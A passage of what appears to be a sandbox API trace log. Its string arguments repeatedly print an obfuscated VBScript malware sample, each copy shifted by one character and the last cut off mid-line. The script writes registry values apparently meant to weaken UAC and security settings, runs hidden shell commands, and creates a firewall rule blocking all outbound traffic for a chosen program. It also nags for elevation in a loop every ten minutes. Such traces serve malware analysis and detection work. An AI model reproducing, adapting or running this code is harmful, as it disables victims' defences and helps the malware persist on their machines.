bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.331] wcsncmp (_String1="icy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.331] wcsncmp (_String1="cy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.332] wcsncmp (_String1="y\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0226.332] wcsncmp (_String1="\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44 [0226.332] wcsncmp (_String1="\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 